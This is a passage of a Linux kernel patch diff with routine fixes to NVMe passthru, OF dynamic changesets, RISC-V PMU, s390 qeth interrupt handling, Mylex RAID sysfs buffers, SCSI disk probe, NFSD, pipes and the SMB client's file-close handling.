+@@ -1063,7 +1063,7 @@ static inline void nvme_auth_free(struct nvme_ctrl *ctrl) {};
+ u32 nvme_command_effects(struct nvme_ctrl *ctrl, struct nvme_ns *ns,
+ 			 u8 opcode);
+ int nvme_execute_passthru_rq(struct request *rq, u32 *effects);
+-void nvme_passthru_end(struct nvme_ctrl *ctrl, u32 effects,
++void nvme_passthru_end(struct nvme_ctrl *ctrl, struct nvme_ns *ns, u32 effects,
+ 		       struct nvme_command *cmd, int status);
+ struct nvme_ctrl *nvme_ctrl_from_file(struct file *file);
+ struct nvme_ns *nvme_find_get_ns(struct nvme_ctrl *ctrl, unsigned nsid);
+diff --git a/drivers/nvme/target/passthru.c b/drivers/nvme/target/passthru.c
+index adc0958755d66..a0a292d49588c 100644
+--- a/drivers/nvme/target/passthru.c
++++ b/drivers/nvme/target/passthru.c
+@@ -216,6 +216,7 @@ static void nvmet_passthru_execute_cmd_work(struct work_struct *w)
+ 	struct nvmet_req *req = container_of(w, struct nvmet_req, p.work);
+ 	struct request *rq = req->p.rq;
+ 	struct nvme_ctrl *ctrl = nvme_req(rq)->ctrl;
++	struct nvme_ns *ns = rq->q->queuedata;
+ 	u32 effects;
+ 	int status;
+ 
+@@ -242,7 +243,7 @@ static void nvmet_passthru_execute_cmd_work(struct work_struct *w)
+ 	blk_mq_free_request(rq);
+ 
+ 	if (effects)
+-		nvme_passthru_end(ctrl, effects, req->cmd, status);
++		nvme_passthru_end(ctrl, ns, effects, req->cmd, status);
+ }
+ 
+ static enum rq_end_io_ret nvmet_passthru_req_done(struct request *rq,
+diff --git a/drivers/of/dynamic.c b/drivers/of/dynamic.c
+index 9bb9fe0fad07c..e2a9651014c6e 100644
+--- a/drivers/of/dynamic.c
++++ b/drivers/of/dynamic.c
+@@ -9,6 +9,7 @@
+ 
+ #define pr_fmt(fmt)	"OF: " fmt
+ 
++#include <linux/device.h>
+ #include <linux/of.h>
+ #include <linux/spinlock.h>
+ #include <linux/slab.h>
+@@ -679,6 +680,17 @@ void of_changeset_destroy(struct of_changeset *ocs)
+ {
+ 	struct of_changeset_entry *ce, *cen;
+ 
++	/*
++	 * When a device is deleted, the device links to/from it are also queued
++	 * for deletion. Until these device links are freed, the devices
++	 * themselves aren't freed. If the device being deleted is due to an
++	 * overlay change, this device might be holding a reference to a device
++	 * node that will be freed. So, wait until all already pending device
++	 * links are deleted before freeing a device node. This ensures we don't
++	 * free any device node that has a non-zero reference count.
++	 */
++	device_link_wait_removal();
++
+ 	list_for_each_entry_safe_reverse(ce, cen, &ocs->entries, node)
+ 		__of_changeset_entry_destroy(ce);
+ }
+diff --git a/drivers/perf/riscv_pmu.c b/drivers/perf/riscv_pmu.c
+index 56897d4d4fd3e..2d5cf135e8a1d 100644
+--- a/drivers/perf/riscv_pmu.c
++++ b/drivers/perf/riscv_pmu.c
+@@ -246,6 +246,10 @@ static int riscv_pmu_event_init(struct perf_event *event)
+ 	u64 event_config = 0;
+ 	uint64_t cmask;
+ 
++	/* driver does not support branch stack sampling */
++	if (has_branch_stack(event))
++		return -EOPNOTSUPP;
++
+ 	hwc->flags = 0;
+ 	mapped_event = rvpmu->event_map(event, &event_config);
+ 	if (mapped_event < 0) {
+diff --git a/drivers/s390/net/qeth_core_main.c b/drivers/s390/net/qeth_core_main.c
+index ae4b6d24bc902..1e6340e2c2588 100644
+--- a/drivers/s390/net/qeth_core_main.c
++++ b/drivers/s390/net/qeth_core_main.c
+@@ -1179,6 +1179,20 @@ static int qeth_check_irb_error(struct qeth_card *card, struct ccw_device *cdev,
+ 	}
+ }
+ 
++/**
++ * qeth_irq() - qeth interrupt handler
++ * @cdev: ccw device
++ * @intparm: expect pointer to iob
++ * @irb: Interruption Response Block
++ *
++ * In the good path:
++ * corresponding qeth channel is locked with last used iob as active_cmd.
++ * But this function is also called for error interrupts.
++ *
++ * Caller ensures that:
++ * Interrupts are disabled; ccw device lock is held;
++ *
++ */
+ static void qeth_irq(struct ccw_device *cdev, unsigned long intparm,
+ 		struct irb *irb)
+ {
+@@ -1220,11 +1234,10 @@ static void qeth_irq(struct ccw_device *cdev, unsigned long intparm,
+ 		iob = (struct qeth_cmd_buffer *) (addr_t)intparm;
+ 	}
+ 
+-	qeth_unlock_channel(card, channel);
+-
+ 	rc = qeth_check_irb_error(card, cdev, irb);
+ 	if (rc) {
+ 		/* IO was terminated, free its resources. */
++		qeth_unlock_channel(card, channel);
+ 		if (iob)
+ 			qeth_cancel_cmd(iob, rc);
+ 		return;
+@@ -1268,6 +1281,7 @@ static void qeth_irq(struct ccw_device *cdev, unsigned long intparm,
+ 		rc = qeth_get_problem(card, cdev, irb);
+ 		if (rc) {
+ 			card->read_or_write_problem = 1;
++			qeth_unlock_channel(card, channel);
+ 			if (iob)
+ 				qeth_cancel_cmd(iob, rc);
+ 			qeth_clear_ipacmd_list(card);
+@@ -1276,6 +1290,26 @@ static void qeth_irq(struct ccw_device *cdev, unsigned long intparm,
+ 		}
+ 	}
+ 
++	if (scsw_cmd_is_valid_cc(&irb->scsw) && irb->scsw.cmd.cc == 1 && iob) {
++		/* channel command hasn't started: retry.
++		 * active_cmd is still set to last iob
++		 */
++		QETH_CARD_TEXT(card, 2, "irqcc1");
++		rc = ccw_device_start_timeout(cdev, __ccw_from_cmd(iob),
++					      (addr_t)iob, 0, 0, iob->timeout);
++		if (rc) {
++			QETH_DBF_MESSAGE(2,
++					 "ccw retry on %x failed, rc = %i\n",
++					 CARD_DEVID(card), rc);
++			QETH_CARD_TEXT_(card, 2, " err%d", rc);
++			qeth_unlock_channel(card, channel);
++			qeth_cancel_cmd(iob, rc);
++		}
++		return;
++	}
++
++	qeth_unlock_channel(card, channel);
++
+ 	if (iob) {
+ 		/* sanity check: */
+ 		if (irb->scsw.cmd.count > iob->length) {
+diff --git a/drivers/scsi/myrb.c b/drivers/scsi/myrb.c
+index e885c1dbf61f9..e2f1b186efd00 100644
+--- a/drivers/scsi/myrb.c
++++ b/drivers/scsi/myrb.c
+@@ -1775,9 +1775,9 @@ static ssize_t raid_state_show(struct device *dev,
+ 
+ 		name = myrb_devstate_name(ldev_info->state);
+ 		if (name)
+-			ret = snprintf(buf, 32, "%s\n", name);
++			ret = snprintf(buf, 64, "%s\n", name);
+ 		else
+-			ret = snprintf(buf, 32, "Invalid (%02X)\n",
++			ret = snprintf(buf, 64, "Invalid (%02X)\n",
+ 				       ldev_info->state);
+ 	} else {
+ 		struct myrb_pdev_state *pdev_info = sdev->hostdata;
+@@ -1796,9 +1796,9 @@ static ssize_t raid_state_show(struct device *dev,
+ 		else
+ 			name = myrb_devstate_name(pdev_info->state);
+ 		if (name)
+-			ret = snprintf(buf, 32, "%s\n", name);
++			ret = snprintf(buf, 64, "%s\n", name);
+ 		else
+-			ret = snprintf(buf, 32, "Invalid (%02X)\n",
++			ret = snprintf(buf, 64, "Invalid (%02X)\n",
+ 				       pdev_info->state);
+ 	}
+ 	return ret;
+@@ -1886,11 +1886,11 @@ static ssize_t raid_level_show(struct device *dev,
+ 
+ 		name = myrb_raidlevel_name(ldev_info->raid_level);
+ 		if (!name)
+-			return snprintf(buf, 32, "Invalid (%02X)\n",
++			return snprintf(buf, 64, "Invalid (%02X)\n",
+ 					ldev_info->state);
+-		return snprintf(buf, 32, "%s\n", name);
++		return snprintf(buf, 64, "%s\n", name);
+ 	}
+-	return snprintf(buf, 32, "Physical Drive\n");
++	return snprintf(buf, 64, "Physical Drive\n");
+ }
+ static DEVICE_ATTR_RO(raid_level);
+ 
+@@ -1903,15 +1903,15 @@ static ssize_t rebuild_show(struct device *dev,
+ 	unsigned char status;
+ 
+ 	if (sdev->channel < myrb_logical_channel(sdev->host))
+-		return snprintf(buf, 32, "physical device - not rebuilding\n");
++		return snprintf(buf, 64, "physical device - not rebuilding\n");
+ 
+ 	status = myrb_get_rbld_progress(cb, &rbld_buf);
+ 
+ 	if (rbld_buf.ldev_num != sdev->id ||
+ 	    status != MYRB_STATUS_SUCCESS)
+-		return snprintf(buf, 32, "not rebuilding\n");
++		return snprintf(buf, 64, "not rebuilding\n");
+ 
+-	return snprintf(buf, 32, "rebuilding block %u of %u\n",
++	return snprintf(buf, 64, "rebuilding block %u of %u\n",
+ 			rbld_buf.ldev_size - rbld_buf.blocks_left,
+ 			rbld_buf.ldev_size);
+ }
+diff --git a/drivers/scsi/myrs.c b/drivers/scsi/myrs.c
+index 7eb8c39da3663..95e7c00cb7e54 100644
+--- a/drivers/scsi/myrs.c
++++ b/drivers/scsi/myrs.c
+@@ -947,9 +947,9 @@ static ssize_t raid_state_show(struct device *dev,
+ 
+ 		name = myrs_devstate_name(ldev_info->dev_state);
+ 		if (name)
+-			ret = snprintf(buf, 32, "%s\n", name);
++			ret = snprintf(buf, 64, "%s\n", name);
+ 		else
+-			ret = snprintf(buf, 32, "Invalid (%02X)\n",
++			ret = snprintf(buf, 64, "Invalid (%02X)\n",
+ 				       ldev_info->dev_state);
+ 	} else {
+ 		struct myrs_pdev_info *pdev_info;
+@@ -958,9 +958,9 @@ static ssize_t raid_state_show(struct device *dev,
+ 		pdev_info = sdev->hostdata;
+ 		name = myrs_devstate_name(pdev_info->dev_state);
+ 		if (name)
+-			ret = snprintf(buf, 32, "%s\n", name);
++			ret = snprintf(buf, 64, "%s\n", name);
+ 		else
+-			ret = snprintf(buf, 32, "Invalid (%02X)\n",
++			ret = snprintf(buf, 64, "Invalid (%02X)\n",
+ 				       pdev_info->dev_state);
+ 	}
+ 	return ret;
+@@ -1066,13 +1066,13 @@ static ssize_t raid_level_show(struct device *dev,
+ 		ldev_info = sdev->hostdata;
+ 		name = myrs_raid_level_name(ldev_info->raid_level);
+ 		if (!name)
+-			return snprintf(buf, 32, "Invalid (%02X)\n",
++			return snprintf(buf, 64, "Invalid (%02X)\n",
+ 					ldev_info->dev_state);
+ 
+ 	} else
+ 		name = myrs_raid_level_name(MYRS_RAID_PHYSICAL);
+ 
+-	return snprintf(buf, 32, "%s\n", name);
++	return snprintf(buf, 64, "%s\n", name);
+ }
+ static DEVICE_ATTR_RO(raid_level);
+ 
+@@ -1086,7 +1086,7 @@ static ssize_t rebuild_show(struct device *dev,
+ 	unsigned char status;
+ 
+ 	if (sdev->channel < cs->ctlr_info->physchan_present)
+-		return snprintf(buf, 32, "physical device - not rebuilding\n");
++		return snprintf(buf, 64, "physical device - not rebuilding\n");
+ 
+ 	ldev_info = sdev->hostdata;
+ 	ldev_num = ldev_info->ldev_num;
+@@ -1098,11 +1098,11 @@ static ssize_t rebuild_show(struct device *dev,
+ 		return -EIO;
+ 	}
+ 	if (ldev_info->rbld_active) {
+-		return snprintf(buf, 32, "rebuilding block %zu of %zu\n",
++		return snprintf(buf, 64, "rebuilding block %zu of %zu\n",
+ 				(size_t)ldev_info->rbld_lba,
+ 				(size_t)ldev_info->cfg_devsize);
+ 	} else
+-		return snprintf(buf, 32, "not rebuilding\n");
++		return snprintf(buf, 64, "not rebuilding\n");
+ }
+ 
+ static ssize_t rebuild_store(struct device *dev,
+@@ -1190,7 +1190,7 @@ static ssize_t consistency_check_show(struct device *dev,
+ 	unsigned short ldev_num;
+ 
+ 	if (sdev->channel < cs->ctlr_info->physchan_present)
+-		return snprintf(buf, 32, "physical device - not checking\n");
++		return snprintf(buf, 64, "physical device - not checking\n");
+ 
+ 	ldev_info = sdev->hostdata;
+ 	if (!ldev_info)
+@@ -1198,11 +1198,11 @@ static ssize_t consistency_check_show(struct device *dev,
+ 	ldev_num = ldev_info->ldev_num;
+ 	myrs_get_ldev_info(cs, ldev_num, ldev_info);
+ 	if (ldev_info->cc_active)
+-		return snprintf(buf, 32, "checking block %zu of %zu\n",
++		return snprintf(buf, 64, "checking block %zu of %zu\n",
+ 				(size_t)ldev_info->cc_lba,
+ 				(size_t)ldev_info->cfg_devsize);
+ 	else
+-		return snprintf(buf, 32, "not checking\n");
++		return snprintf(buf, 64, "not checking\n");
+ }
+ 
+ static ssize_t consistency_check_store(struct device *dev,
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index c793bca882236..f32236c3f81c6 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -3636,7 +3636,7 @@ static int sd_probe(struct device *dev)
+ 
+ 	error = device_add_disk(dev, gd, NULL);
+ 	if (error) {
+-		put_device(&sdkp->disk_dev);
++		device_unregister(&sdkp->disk_dev);
+ 		put_disk(gd);
+ 		goto out;
+ 	}
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index e4522e86e984e..8d15959004ad2 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -2889,12 +2889,9 @@ static void
+ nfsd4_cb_recall_any_release(struct nfsd4_callback *cb)
+ {
+ 	struct nfs4_client *clp = cb->cb_clp;
+-	struct nfsd_net *nn = net_generic(clp->net, nfsd_net_id);
+ 
+-	spin_lock(&nn->client_lock);
+ 	clear_bit(NFSD4_CLIENT_CB_RECALL_ANY, &clp->cl_flags);
+-	put_client_renew_locked(clp);
+-	spin_unlock(&nn->client_lock);
++	drop_client(clp);
+ }
+ 
+ static const struct nfsd4_callback_ops nfsd4_cb_recall_any_ops = {
+@@ -6231,7 +6228,7 @@ deleg_reaper(struct nfsd_net *nn)
+ 		list_add(&clp->cl_ra_cblist, &cblist);
+ 
+ 		/* release in nfsd4_cb_recall_any_release */
+-		atomic_inc(&clp->cl_rpc_users);
++		kref_get(&clp->cl_nfsdfs.cl_ref);
+ 		set_bit(NFSD4_CLIENT_CB_RECALL_ANY, &clp->cl_flags);
+ 		clp->cl_ra_time = ktime_get_boottime_seconds();
+ 	}
+diff --git a/fs/pipe.c b/fs/pipe.c
+index 9873a6030df56..aa8e6ffe1cb58 100644
+--- a/fs/pipe.c
++++ b/fs/pipe.c
+@@ -424,6 +424,18 @@ pipe_write(struct kiocb *iocb, struct iov_iter *from)
+ 	bool was_empty = false;
+ 	bool wake_next_writer = false;
+ 
++	/*
++	 * Reject writing to watch queue pipes before the point where we lock
++	 * the pipe.
++	 * Otherwise, lockdep would be unhappy if the caller already has another
++	 * pipe locked.
++	 * If we had to support locking a normal pipe and a notification pipe at
++	 * the same time, we could set up lockdep annotations for that, but
++	 * since we don't actually need that, it's simpler to just bail here.
++	 */
++	if (pipe_has_watch_queue(pipe))
++		return -EXDEV;
++
+ 	/* Null write succeeds. */
+ 	if (unlikely(total_len == 0))
+ 		return 0;
+@@ -436,11 +448,6 @@ pipe_write(struct kiocb *iocb, struct iov_iter *from)
+ 		goto out;
+ 	}
+ 
+-	if (pipe_has_watch_queue(pipe)) {
+-		ret = -EXDEV;
+-		goto out;
+-	}
+-
+ 	/*
+ 	 * If it wasn't empty we try to merge new data into
+ 	 * the last buffer.
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+index 86fe433b1d324..f4ad343b06c1f 100644
+--- a/fs/smb/client/cached_dir.c
++++ b/fs/smb/client/cached_dir.c
+@@ -370,6 +370,7 @@ smb2_close_cached_fid(struct kref *ref)
+ {
+ 	struct cached_fid *cfid = container_of(ref, struct cached_fid,
+ 					       refcount);
++	int rc;
+ 
+ 	spin_lock(&cfid->cfids->cfid_list_lock);
+ 	if (cfid->on_list) {
+@@ -383,9 +384,10 @@ smb2_close_cached_fid(struct kref *ref)
+ 	cfid->dentry = NULL;
+ 
+ 	if (cfid->is_open) {
+-		SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
++		rc = SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
+ 			   cfid->fid.volatile_fid);
+-		atomic_dec(&cfid->tcon->num_remote_opens);
++		if (rc != -EBUSY && rc != -EAGAIN)
++			atomic_dec(&cfid->tcon->num_remote_opens);
+ 	}
+ 
+ 	free_cached_dir(cfid);
+diff --git a/fs/smb/client/cifs_debug.c b/fs/smb/client/cifs_debug.c
+index 5df8d93233376..a2afdf9c5f80b 100644
+--- a/fs/smb/client/cifs_debug.c
++++ b/fs/smb/client/cifs_debug.c
+@@ -186,6 +186,8 @@ static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+ 		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			if (cifs_ses_exiting(ses))
++				continue;
+ 			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 				spin_lock(&tcon->open_file_lock);
+ 				list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+@@ -566,6 +568,8 @@ static ssize_t cifs_stats_proc_write(struct file *file,
+ 			}
+ #endif /* CONFIG_CIFS_STATS2 */
+ 			list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++				if (cifs_ses_exiting(ses))
++					continue;
+ 				list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 					atomic_set(&tcon->num_smbs_sent, 0);
+ 					spin_lock(&tcon->stat_lock);
+@@ -644,6 +648,8 @@ static int cifs_stats_proc_show(struct seq_file *m, void *v)
+ 			}
+ #endif /* STATS2 */
+ 		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			if (cifs_ses_exiting(ses))
++				continue;
+ 			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 				i++;
+ 				seq_printf(m, "\n%d) %s", i, tcon->tree_name);
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 7286a56aebfa9..0a79771c8f33b 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -154,6 +154,7 @@ struct workqueue_struct	*decrypt_wq;
+ struct workqueue_struct	*fileinfo_put_wq;
+ struct workqueue_struct	*cifsoplockd_wq;
+ struct workqueue_struct	*deferredclose_wq;
++struct workqueue_struct	*serverclose_wq;
+ __u32 cifs_lock_secret;
+ 
+ /*
+@@ -1866,6 +1867,13 @@ init_cifs(void)
+ 		goto out_destroy_cifsoplockd_wq;
+ 	}
+ 
++	serverclose_wq = alloc_workqueue("serverclose",
++					   WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
++	if (!serverclose_wq) {
++		rc = -ENOMEM;
++		goto out_destroy_serverclose_wq;
++	}
++
+ 	rc = cifs_init_inodecache();
+ 	if (rc)
+ 		goto out_destroy_deferredclose_wq;
+@@ -1940,6 +1948,8 @@ init_cifs(void)
+ 	destroy_workqueue(decrypt_wq);
+ out_destroy_cifsiod_wq:
+ 	destroy_workqueue(cifsiod_wq);
++out_destroy_serverclose_wq:
++	destroy_workqueue(serverclose_wq);
+ out_clean_proc:
+ 	cifs_proc_clean();
+ 	return rc;
+@@ -1969,6 +1979,7 @@ exit_cifs(void)
+ 	destroy_workqueue(cifsoplockd_wq);
+ 	destroy_workqueue(decrypt_wq);
+ 	destroy_workqueue(fileinfo_put_wq);
++	destroy_workqueue(serverclose_wq);
+ 	destroy_workqueue(cifsiod_wq);
+ 	cifs_proc_clean();
+ }
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 58bb54994e22a..e5a72f9c793ef 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -389,10 +389,10 @@ struct smb_version_operations {
+ 	/* set fid protocol-specific info */
+ 	void (*set_fid)(struct cifsFileInfo *, struct cifs_fid *, __u32);
+ 	/* close a file */
+-	void (*close)(const unsigned int, struct cifs_tcon *,
++	int (*close)(const unsigned int, struct cifs_tcon *,
+ 		      struct cifs_fid *);
+ 	/* close a file, returning file attributes and timestamps */
+-	void (*close_getattr)(const unsigned int xid, struct cifs_tcon *tcon,
++	int (*close_getattr)(const unsigned int xid, struct cifs_tcon *tcon,
+ 		      struct cifsFileInfo *pfile_info);
+ 	/* send a flush request to the server */
+ 	int (*flush)(const unsigned int, struct cifs_tcon *, struct cifs_fid *);
+@@ -1359,6 +1359,7 @@ struct cifsFileInfo {
+ 	bool invalidHandle:1;	/* file closed via session abend */
+ 	bool swapfile:1;
+ 	bool oplock_break_cancelled:1;
++	bool offload:1; /* offload final part of _put to a wq */
+ 	unsigned int oplock_epoch; /* epoch from the lease break */
+ 	__u32 oplock_level; /* oplock/lease level from the lease break */
+ 	int count;
+@@ -1367,6 +1368,7 @@ struct cifsFileInfo {
+ 	struct cifs_search_info srch_inf;
+ 	struct work_struct oplock_break; /* work for oplock breaks */
+ 	struct work_struct put; /* work for the final part of _put */
++	struct work_struct serverclose; /* work for serverclose */
+ 	struct delayed_work deferred;
+ 	bool deferred_close_scheduled; /* Flag to indicate close is scheduled */
+ 	char *symlink_target;
+@@ -2005,6 +2007,7 @@ extern struct workqueue_struct *decrypt_wq;
+ extern struct workqueue_struct *fileinfo_put_wq;
+ extern struct workqueue_struct *cifsoplockd_wq;
+ extern struct workqueue_struct *deferredclose_wq;
++extern struct workqueue_struct *serverclose_wq;
+ extern __u32 cifs_lock_secret;
+ 
+ extern mempool_t *cifs_mid_poolp;
+@@ -2175,4 +2178,14 @@ static inline struct scatterlist *cifs_sg_set_buf(struct scatterlist *sg,
+ 	return sg;
+ }
+ 
++static inline bool cifs_ses_exiting(struct cifs_ses *ses)
++{
++	bool ret;
++
++	spin_lock(&ses->ses_lock);
++	ret = ses->ses_status == SES_EXITING;
++	spin_unlock(&ses->ses_lock);
++	return ret;
++}
++
+ #endif	/* _CIFS_GLOB_H */
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 49fdc6dfdcf8d..8c2a784200ec2 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -216,6 +216,8 @@ cifs_signal_cifsd_for_reconnect(struct TCP_Server_Info *server,
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (cifs_ses_exiting(ses))
++			continue;
+ 		spin_lock(&ses->chan_lock);
+ 		for (i = 0; i < ses->chan_count; i++) {
+ 			spin_lock(&ses->chans[i].server->srv_lock);
+diff --git a/fs/smb/client/dir.c b/fs/smb/client/dir.c
+index e382b794acbed..863c7bc3db86f 100644
+--- a/fs/smb/client/dir.c
++++ b/fs/smb/client/dir.c
+@@ -180,6 +180,7 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 	int disposition;
+ 	struct TCP_Server_Info *server = tcon->ses->server;
+ 	struct cifs_open_parms oparms;
++	int rdwr_for_fscache = 0;
+ 
+ 	*oplock = 0;
+ 	if (tcon->ses->server->oplocks)
+@@ -191,6 +192,10 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 		return PTR_ERR(full_path);
+ 	}
+ 
++	/* If we're caching, we need to be able to fill in around partial writes. */
++	if (cifs_fscache_enabled(inode) && (oflags & O_ACCMODE) == O_WRONLY)
++		rdwr_for_fscache = 1;
++
+ #ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+ 	if (tcon->unix_ext && cap_unix(tcon->ses) && !tcon->broken_posix_open &&
+ 	    (CIFS_UNIX_POSIX_PATH_OPS_CAP &
+@@ -267,6 +272,8 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 		desired_access |= GENERIC_READ; /* is this too little? */
+ 	if (OPEN_FMODE(oflags) & FMODE_WRITE)
+ 		desired_access |= GENERIC_WRITE;
++	if (rdwr_for_fscache == 1)
++		desired_access |= GENERIC_READ;
+ 
+ 	disposition = FILE_OVERWRITE_IF;
+ 	if ((oflags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
+@@ -295,6 +302,7 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 	if (!tcon->unix_ext && (mode & S_IWUGO) == 0)
+ 		create_options |= CREATE_OPTION_READONLY;
+ 
++retry_open:
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
+@@ -308,8 +316,15 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 	rc = server->ops->open(xid, &oparms, oplock, buf);
+ 	if (rc) {
+ 		cifs_dbg(FYI, "cifs_create returned 0x%x\n", rc);
++		if (rc == -EACCES && rdwr_for_fscache == 1) {
++			desired_access &= ~GENERIC_READ;
++			rdwr_for_fscache = 2;
++			goto retry_open;
++		}
+ 		goto out;
+ 	}
++	if (rdwr_for_fscache == 2)
++		cifs_invalidate_cache(inode, FSCACHE_INVAL_DIO_WRITE);
+ 
+ #ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+ 	/*
+diff --git a/fs/smb/client/file.c b/fs/smb/client/file.c
+index 0f3405e0f2e48..d23dfc83de507 100644
+--- a/fs/smb/client/file.c
++++ b/fs/smb/client/file.c
+@@ -77,12 +77,12 @@ cifs_mark_open_files_invalid(struct cifs_tcon *tcon)
+ 	 */
+ }
+ 
+-static inline int cifs_convert_flags(unsigned int flags)
++static inline int cifs_convert_flags(unsigned int flags, int rdwr_for_fscache)
+ {
+ 	if ((flags & O_ACCMODE) == O_RDONLY)
+ 		return GENERIC_READ;
+ 	else if ((flags & O_ACCMODE) == O_WRONLY)
+-		return GENERIC_WRITE;
++		return rdwr_for_fscache == 1 ? (GENERIC_READ | GENERIC_WRITE) : GENERIC_WRITE;
+ 	else if ((flags & O_ACCMODE) == O_RDWR) {
+ 		/* GENERIC_ALL is too much permission to request
+ 		   can cause unnecessary access denied on create */
+@@ -219,11 +219,16 @@ static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_
+ 	int create_options = CREATE_NOT_DIR;
+ 	struct TCP_Server_Info *server = tcon->ses->server;
+ 	struct cifs_open_parms oparms;
++	int rdwr_for_fscache = 0;
+ 
+ 	if (!server->ops->open)
+ 		return -ENOSYS;
+ 
+-	desired_access = cifs_convert_flags(f_flags);
++	/* If we're caching, we need to be able to fill in around partial writes. */
++	if (cifs_fscache_enabled(inode) && (f_flags & O_ACCMODE) == O_WRONLY)
++		rdwr_for_fscache = 1;
++
++	desired_access = cifs_convert_flags(f_flags, rdwr_for_fscache);
+ 
+ /*********************************************************************
+  *  open flag mapping table:
+@@ -260,6 +265,7 @@ static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_
+ 	if (f_flags & O_DIRECT)
+ 		create_options |= CREATE_NO_BUFFER;
+ 
++retry_open:
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
+@@ -271,8 +277,16 @@ static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_
+ 	};
+ 
+ 	rc = server->ops->open(xid, &oparms, oplock, buf);
+-	if (rc)
++	if (rc) {
++		if (rc == -EACCES && rdwr_for_fscache == 1) {
++			desired_access = cifs_convert_flags(f_flags, 0);
++			rdwr_for_fscache = 2;
++			goto retry_open;
++		}
+ 		return rc;
++	}
++	if (rdwr_for_fscache == 2)
++		cifs_invalidate_cache(inode, FSCACHE_INVAL_DIO_WRITE);
+ 
+ 	/* TODO: Add support for calling posix query info but with passing in fid */
+ 	if (tcon->unix_ext)
+@@ -316,6 +330,7 @@ cifs_down_write(struct rw_semaphore *sem)
+ }
+ 
+ static void cifsFileInfo_put_work(struct work_struct *work);
++void serverclose_work(struct work_struct *work);
+ 
+ struct cifsFileInfo *cifs_new_fileinfo(struct cifs_fid *fid, struct file *file,
+ 				       struct tcon_link *tlink, __u32 oplock,
+@@ -362,6 +377,7 @@ struct cifsFileInfo *cifs_new_fileinfo(struct cifs_fid *fid, struct file *file,
+ 	cfile->tlink = cifs_get_tlink(tlink);
+ 	INIT_WORK(&cfile->oplock_break, cifs_oplock_break);
+ 	INIT_WORK(&cfile->put, cifsFileInfo_put_work);
++	INIT_WORK(&cfile->serverclose, serverclose_work);
+ 	INIT_DELAYED_WORK(&cfile->deferred, smb2_deferred_work_close);
+ 	mutex_init(&cfile->fh_mutex);
+ 	spin_lock_init(&cfile->file_info_lock);
+@@ -453,6 +469,40 @@ static void cifsFileInfo_put_work(struct work_struct *work)
+ 	cifsFileInfo_put_final(cifs_file);
+ }
+ 
++void serverclose_work(struct work_struct *work)
++{
++	struct cifsFileInfo *cifs_file = container_of(work,
++			struct cifsFileInfo, serverclose);
++
++	struct cifs_tcon *tcon = tlink_tcon(cifs_file->tlink);
++
++	struct TCP_Server_Info *server = tcon->ses->server;
++	int rc = 0;
++	int retries = 0;
++	int MAX_RETRIES = 4;
++
++	do {
++		if (server->ops->close_getattr)
++			rc = server->ops->close_getattr(0, tcon, cifs_file);
++		else if (server->ops->close)
++			rc = server->ops->close(0, tcon, &cifs_file->fid);
++
++		if (rc == -EBUSY || rc == -EAGAIN) {
++			retries++;
++			msleep(250);
++		}
++	} while ((rc == -EBUSY || rc == -EAGAIN) && (retries < MAX_RETRIES)
++	);
++
++	if (retries == MAX_RETRIES)
++		pr_warn("Serverclose failed %d times, giving up\n", MAX_RETRIES);
++
++	if (cifs_file->offload)
++		queue_work(fileinfo_put_wq, &cifs_file->put);
++	else
++		cifsFileInfo_put_final(cifs_file);
++}
++
+ /**
+  * cifsFileInfo_put - release a reference of file priv data
+  *
+@@ -493,10 +543,13 @@ void _cifsFileInfo_put(struct cifsFileInfo *cifs_file,
+ 	struct cifs_fid fid = {};
+ 	struct cifs_pending_open open;
+ 	bool oplock_break_cancelled;
++	bool serverclose_offloaded = false;
+ 
+ 	spin_lock(&tcon->open_file_lock);
+ 	spin_lock(&cifsi->open_file_lock);
+ 	spin_lock(&cifs_file->file_info_lock);
++
++	cifs_file->offload = offload;
+ 	if (--cifs_file->count > 0) {
+ 		spin_unlock(&cifs_file->file_info_lock);
+ 		spin_unlock(&cifsi->open_file_lock);
